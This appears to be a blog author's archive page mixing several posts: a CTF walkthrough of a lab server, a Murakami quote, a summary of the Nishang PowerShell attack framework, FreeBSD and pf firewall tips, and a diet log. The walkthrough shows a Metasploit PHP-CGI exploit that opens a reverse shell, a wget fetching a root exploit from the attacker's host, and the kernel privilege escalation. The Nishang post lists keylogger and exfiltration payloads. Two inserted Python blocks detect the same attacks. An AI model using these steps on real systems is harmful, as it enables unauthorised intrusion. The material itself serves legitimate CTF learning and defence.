All posts by jbower

Double Kill – Hacker’s Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower) competed in the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines, each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server, and here is the walkthrough.

First target: 10.200.0.4

Nmap scan:
==========

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH and Apache are both relatively current, so it is time to see what Nikto finds.

Nikto scan:
===========

-----------------------------------------------------------------------
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
-----------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
-----------------------------------------------------------------------

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:
=================

Dirb finds nothing of real interest.

http://10.200.0.4/cgi-bin/

Going back over my Nikto results, I see this: (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability, so I dug a little deeper, came across a couple of great articles about it, and eventually found out that Metasploit already had a module for it.  Great!
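The Nikto finding is the PHP-CGI argument-injection pattern: when PHP is run as a CGI, a query string that contains no literal = is handed to the interpreter as command-line arguments, so ?-s becomes php-cgi's -s (show source) switch. As an added example that is not part of the original post, here is a small Python detector that applies exactly that check to Apache access-log lines; the log lines, IP addresses and paths are constructed for the example, and the sample requests are limited to the -s probe from the Nikto output and a harmless -d define.

```python
"""Flag HTTP requests matching the PHP-CGI argument-injection pattern that
Nikto reported (a query string such as ?-s reaching php-cgi as argv).
Added example for defenders; not part of the original post."""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format, loosely matched (fields after size ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines; the addresses and paths are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jul/2014:17:06:01 +0200] "GET /phpMyAdmin-4.2.6-all-languages/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Jul/2014:11:30:02 -0400] "GET /?-s HTTP/1.1" 200 2048 "-" "Nikto"
10.0.0.9 - - [26/Jul/2014:11:31:07 -0400] "GET /index.php?%2Ds HTTP/1.1" 200 2048 "-" "curl/7.30"
10.0.0.9 - - [26/Jul/2014:11:31:40 -0400] "POST /index.php?%2Dd+display_errors%3D1 HTTP/1.1" 200 512 "-" "curl/7.30"
10.0.0.7 - - [26/Jul/2014:11:32:15 -0400] "GET /index.php?page=-1 HTTP/1.1" 200 512 "-" "curl/7.30"
10.0.0.7 - - [26/Jul/2014:11:33:15 -0400] "GET /search?q=%2Dfoo HTTP/1.1" 200 512 "-" "curl/7.30"
"""


def is_cgi_arg_injection(raw_query: str) -> bool:
    """True when the query string would reach php-cgi as argv and starts with '-'.

    Per the CGI spec (RFC 3875, section 4.4) the web server only passes the
    query string on the command line when it contains no *literal* '=', which
    is why probes URL-encode '=' as %3D.  Decoding before the leading-dash
    check catches the %2D spelling of '-' as well; '+' separates arguments.
    """
    if not raw_query or "=" in raw_query:
        return False
    first_arg = unquote(raw_query).split("+", 1)[0]
    return first_arg.startswith("-")


def find_suspicious_requests(log_text: str):
    """Return (ip, method, target) for every log line matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        raw_query = urlsplit(m["target"]).query
        if is_cgi_arg_injection(raw_query):
            hits.append((m["ip"], m["method"], m["target"]))
    return hits


if __name__ == "__main__":
    for ip, method, target in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {method} {target}")
```

The two conditions (no literal = in the query, leading dash after decoding) are the same ones the mod_rewrite workaround that was published for this bug checks, so each hit is a request that would actually have reached php-cgi as an argument; the lasting fix is a patched php-cgi or not serving PHP through CGI at all. Note that the two 10.0.0.7 requests are legitimate: a literal = keeps the query out of argv, and q=-foo does not start with a dash.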

Exploitation:
=============

https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection


msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting  Required  Description
----         ---------------  --------  -----------
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Automatic

msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'

First flag:
===========

[email protected]:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:
===================

Target kernel and architecture: 3.2.0-23-generic x86_64

http://www.exploit-db.com/exploits/33589/

[email protected]:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
--2014-07-26 23:42:11--  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c'

100%[======================================>] 3,845       --.-K/s   in 0s

2014-07-26 23:42:11 (20.3 MB/s) - `exploit.c' saved [3845/3845]

[email protected]:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
[email protected]:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
[email protected]:/tmp/infinity# whoami
whoami
root
[email protected]:/tmp/infinity# cd /root
cd /root
[email protected]:~# ls
ls
superuser-trophy.txt

Second flag:
===========

[email protected]:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01

[email protected]:~#

Creative Structure is Key by Haruki Murakami

There is a quote I read today by Haruki Murakami that really made me sit back and think about how I handle all my daily task and projects.  Especially with my obsession lately for absolute peak performance in my life.

“When I’m in writing mode for a novel, I get up at four a.m. and work for five or six hours.  In the afternoon, I run for ten kilometers or swim for fifteen-hundred meters (or do both), then I read a bit and listen to some music.  I go to bed at nine p.m.  I keep to this routine every day without variation.  The repetition itself becomes the important thing; it’s a form of mesmerism.  I mesmerize myself to reach a deeper state of mind.  But to hold to such a repetition for so long, six months to a year, requires a good amount of mental and physical strength.  In that sense, writing a long novel is like survival training.  Physical strength is as necessary as artistic sensitivity.”

Own Windows with PowerShell using Nishang

Nishang is a framework and collection of scripts and payloads that enables the use of Windows PowerShell for offensive security and post-exploitation during penetration tests.  The scripts were written to meet the author’s needs during real penetration tests.

PAYLOADS
It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.

HELP
All payloads and scripts are Get-Help compatible. Use "Get-Help -full" on a PowerShell prompt to get full help details.

CHANGELOG for version 0.2.7
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, they no longer stop automatically after running a script/command.
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
– Fixed a minor bug in DNS_TXT_Pwnage.
– All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
– Added Get-PassHashes payload.
– Added Download-Execute-PS payload.
– The keylogger logs only fresh keys after exfiltrating the keys 30 times.
– A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.

FreeBSD pkg_add little trick

So don’t ask me why but I decided to run FreeBSD 6.0 on an older Dell Latitude laptop. Install goes fine. But now I’ve got an issue. When trying to install a package I get the troublesome ftp error (cannot find this location dummy). But this was quickly resolved with the following.

You can also see which ftp directory your FreeBSD system is currently using by reading the error received when you try to install a bogus package:

# pkg_add -r test
Error: FTP Unable to get ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-release/Latest/abc.tbz: File unavailable (e.g., file not found, no access)
pkg_add: unable to fetch 'ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-release/Latest/abc.tbz' by URL

In this case, the system is using packages-6-release/Latest, which contains the 6.9 version of xorg, instead of packages-6-stable, which contains the latest (7.2) version of xorg. Take a peek in both directories on the ftp site and you’ll see for yourself.

You can point pkg_add at a different location by setting the PACKAGESITE environment variable; type this as one line:

# setenv PACKAGESITE ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-6-stable/Latest/

And Eureka! No more install issues.

Stopping FTP Brute Force Attacks in FreeBSD and OpenBSD

This is a great little article that I came across about stopping FTP brute force attacks on OpenBSD or FreeBSD (both favorite OSes of mine). It assumes that you’re using PF as your firewall (which you should!).

You can easily stop brute force attacks by limiting connections per IP with the pf firewall under FreeBSD or OpenBSD.

Open /etc/pf.conf

# vi /etc/pf.conf

Update it as follows:

# the list of known FTPD attackers; the table name matches the pfctl -t ftp-attacks
# commands below (the angle brackets are part of pf's table syntax)
# the file must already exist when the ruleset is loaded, so create it empty first
# (touch /etc/pf.ftp.block.list)
table <ftp-attacks> persist file "/etc/pf.ftp.block.list"

# block all incoming connections from attackers on FTPD
# (the ext_if macro is assumed to be defined earlier in pf.conf)
block in quick on $ext_if from <ftp-attacks>

# Let us allow FTP with bruteforce protection
pass in quick on $ext_if inet proto tcp from any to ($ext_if) port 21 keep state (max-src-conn-rate 5/40, overload <ftp-attacks> flush global)

The rule above adds a source address to the ftp-attacks table once it opens more than 5 new connections to port 21 within 40 seconds; the block rule then drops all further traffic from that address, and flush global also kills the states it already holds. Because the table lives in kernel memory, append the following line to /etc/rc.shutdown so the table is written back to the file it is loaded from at boot and the entries survive a reboot:

# echo '/sbin/pfctl -t ftp-attacks -T show > /etc/pf.ftp.block.list' >> /etc/rc.shutdown

Finally, reload the pf ruleset (this is the FreeBSD command; on OpenBSD use pfctl -f /etc/pf.conf):

# /etc/rc.d/pf reload

To list currently blocked IP (attackers IP), enter:

# pfctl -t ftp-attacks -T show
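To see what max-src-conn-rate 5/40 with overload actually decides, here is an added Python replay (not part of the original article) that applies the same policy to constructed ftpd syslog lines: a source that opens more than 5 connections inside any 40-second window is put on the block list, the connections it already has are dropped (flush global), and everything it sends afterwards is discarded by the block rule. The hostname gw, the addresses and the timestamps are made up for the example; pf does its own per-source counting in the kernel, so this reproduces the rule's intent on log data rather than pf's internal bookkeeping.

```python
"""Replay ftpd connection log lines against the policy expressed by
`max-src-conn-rate 5/40, overload <ftp-attacks> flush global`.
Added example; not from the original article and not pf's own algorithm."""
import re
from collections import defaultdict, deque
from datetime import datetime

MAX_CONN = 5      # from "max-src-conn-rate 5/40": more than 5 new connections ...
WINDOW_SEC = 40   # ... within 40 seconds trips the overload

# syslog line as written by ftpd; hostname and PIDs are constructed
LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ ftpd\[\d+\]: '
    r'connection from (?P<ip>\S+)$'
)

# Constructed sample: 198.51.100.7 hammers the server, 203.0.113.4 stays
# just under the limit (its 6th connection comes 41 s after its first).
SAMPLE_LOG = """\
Jul 26 11:20:00 gw ftpd[1201]: connection from 198.51.100.7
Jul 26 11:20:04 gw ftpd[1202]: connection from 198.51.100.7
Jul 26 11:20:05 gw ftpd[1203]: connection from 203.0.113.4
Jul 26 11:20:09 gw ftpd[1204]: connection from 198.51.100.7
Jul 26 11:20:13 gw ftpd[1205]: connection from 198.51.100.7
Jul 26 11:20:18 gw ftpd[1206]: connection from 198.51.100.7
Jul 26 11:20:20 gw ftpd[1207]: connection from 203.0.113.4
Jul 26 11:20:22 gw ftpd[1208]: connection from 198.51.100.7
Jul 26 11:20:30 gw ftpd[1209]: connection from 198.51.100.7
Jul 26 11:20:35 gw ftpd[1210]: connection from 203.0.113.4
Jul 26 11:20:40 gw ftpd[1211]: connection from 203.0.113.4
Jul 26 11:20:44 gw ftpd[1212]: connection from 203.0.113.4
Jul 26 11:20:46 gw ftpd[1213]: connection from 203.0.113.4
"""


def replay(log_text: str):
    """Return (blocked, dropped): blocked maps ip -> timestamp at which the
    overload rule would have added it to <ftp-attacks>; dropped counts the
    later connections the block rule would have discarded."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    blocked = {}
    dropped = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts = m["ip"], m["ts"]
        t = datetime.strptime(ts, "%b %d %H:%M:%S")  # year not needed for deltas
        if ip in blocked:
            dropped += 1           # "block in quick ... from <ftp-attacks>"
            continue
        q = recent[ip]
        while q and (t - q[0]).total_seconds() >= WINDOW_SEC:
            q.popleft()            # slide the 40-second window
        q.append(t)
        if len(q) > MAX_CONN:
            blocked[ip] = ts       # overload <ftp-attacks>
            q.clear()              # flush global: existing states are killed
    return blocked, dropped


if __name__ == "__main__":
    blocked, dropped = replay(SAMPLE_LOG)
    for ip, ts in blocked.items():
        print(f"{ip} added to <ftp-attacks> at {ts}")
    print(f"{dropped} later connection(s) dropped by the block rule")
```

Run against the sample, the sixth connection from 198.51.100.7 at 11:20:22 is the one that trips the limit and its connection at 11:20:30 is dropped, while 203.0.113.4 never exceeds five inside a window and is left alone. When tuning the 5/40 numbers for a real server, this is the check to run over a day of genuine ftpd logs first, so that busy legitimate clients are not swept into the table.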

WORKOUT

So I’ve been getting up @ 5am to work out and I must say that I’m pretty psyched about it. Well, not the getting up at 5 part. But I’m pretty happy that I’ve been consistently going to the gym lately. My six-pack is just a few short months away from finally arriving!! I’m working on my diet as well, which, if it doesn’t kill me, will hopefully make me ripped. Here it is, essentially; Daniel and I call it the AC Slater diet.

After morning workout – Protein Shake
11am – Protein Shake
Noon – Tuna sandwich, banana
3pm – Protein Shake or cheese
5pm – Apple
7pm – Protein Shake

All Day Long – 1 gallon of water.